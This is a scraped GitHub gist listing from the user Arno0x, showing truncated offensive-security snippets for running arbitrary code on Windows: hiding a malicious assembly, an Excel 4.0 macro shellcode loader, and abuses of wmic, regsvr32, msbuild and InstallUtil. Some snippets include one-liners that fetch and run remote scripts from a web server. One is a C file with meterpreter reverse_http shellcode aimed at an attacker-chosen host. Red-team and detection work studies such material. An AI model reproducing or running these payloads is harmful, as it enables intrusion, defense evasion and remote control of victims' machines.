Skip to content

Instantly share code, notes, and snippets.

Arno0x

Block or report user

Report or block Arno0x

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@Arno0x
Arno0x / malicious.cs
Last active Jun 25, 2019
Hide malicious assembly in another one with RunTime code compiling
View malicious.cs
/*
Author: Arno0x0x, Twitter: @Arno0x0x
DO NOT COMPILE THIS SOURCE FILE !
Encode this source in base64:
base64 -w0 malicious.cs > malicious.b64
Then paste it in the code in "not_detected.cs" source file
@Arno0x
Arno0x / shellcode.xlsm
Last active Jun 23, 2019
XLM (Excel 4.0 macro) to execute a shellcode into Excel (32 bits) - French Macro code
View shellcode.xlsm
BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL
1. Open Excel
2. Click on the active tab
3. Select "Insérer"
4. Click on "Macro MS Excel 4.0".
5. This will create a new worksheet called "Macro1"
================================================================================
In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1:
@Arno0x
Arno0x / TestAssembly.cs
Last active Jun 18, 2019
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
View TestAssembly.cs
/*
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
*/
using System.Windows.Forms;
namespace TestNamespace
@Arno0x
Arno0x / wmic.xsl
Created Apr 18, 2018
Oneliner for arbitrary code download and execution
View wmic.xsl
<?xml version='1.0'?>
<!-- Discovered by @SubTee and @mattifestation -->
<!-- Execute with: wmic os get /format:"https://webserver/wmic.xsl" -->
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
@Arno0x
Arno0x / transformFile.py
Last active Jun 4, 2019
Performs multiple useful transformation on files
View transformFile.py
#!/usr/bin/python
# -*- coding: utf8 -*-
#
# Author: Arno0x0x, Twitter: @Arno0x0x
#
import argparse
from Crypto.Cipher import AES
import pyscrypt
from base64 import b64encode
@Arno0x
Arno0x / regasm.cs
Created Nov 17, 2017
A DLL that can be called from regasm.exe/regsvc.exe to execute arbitrary code
View regasm.cs
/*
============== Compile ============
Create Your Strong Name Key -> key.snk
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framewor
@Arno0x
Arno0x / regsvr32.sct
Created Nov 17, 2017
A scriptlet that can be executed by regsvr32.exe for arbitrary code execution
View regsvr32.sct
<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
<scriptlet>
<registration
progid="PoC"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
@Arno0x
Arno0x / msbuild.xml
Created Nov 17, 2017
MSBuild project definition to execute arbitrary code from msbuild.exe
View msbuild.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
@Arno0x
Arno0x / installUtil.cs
Created Sep 26, 2017
Example of a C# DLL to be used with the InstallUtil utility to make it execute some arbitrary code
View installUtil.cs
/*
Author: Arno0x0x, Twitter: @Arno0x0x
===================================== COMPILING =====================================
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /unsafe /out:installUtil.dll installUtil.cs
===================================== USAGE =====================================
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logtoconsole=false /logfile= /u installUtil.dll
*/
View shellcode_ExcelRegisterXLL.c
// Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll
#include <Windows.h>
__declspec(dllexport) void __cdecl xlAutoOpen(void);
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
// Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c"
unsigned char b[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
You can’t perform that action at this time.